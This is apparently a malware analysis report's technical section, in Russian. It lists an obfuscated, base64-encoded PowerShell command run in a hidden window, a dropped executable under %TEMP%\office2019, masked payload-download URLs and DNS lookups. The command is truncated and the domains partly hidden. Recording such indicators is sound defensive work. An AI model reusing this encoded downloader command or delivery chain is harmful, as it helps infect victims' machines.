Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAHIAMgBoAGUAegA5AD0AKAAnAEcAJwArACcAcQBkACcAKwAnAGUAagBvAG4AJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAGUAbQBQAFwAbwBGAGYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\hff22jal0.exe
- %TEMP%\office2019\hff22jal0.exe
- %TEMP%\office2019\hff22jal0.exe
- http://sa#####e-roofing.com/cpgmz/AcdMcVRS/
- http://www.sa#####e-roofing.com/cpgmz/AcdMcVRS/
- http://we###nder.org/wp-admin/BiyKnfrTY/
- http://av######aseandrentals.com/plugins/a83E826dz6s6205/
- http://ag##ade.hu/images/GEwrjxo8p85338/
- DNS ASK 6i##v.com
- DNS ASK sa#####e-roofing.com
- DNS ASK we###nder.org
- DNS ASK av######aseandrentals.com
- DNS ASK ag##ade.hu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAHIAMgBoAGUAegA5AD0AKAAnAEcAJwArACcAcQBkACcAKwAnAGUAagBvAG4AJwApADsAJgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAFYAOgBUAGUAbQBQAFwAbwBGAGYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)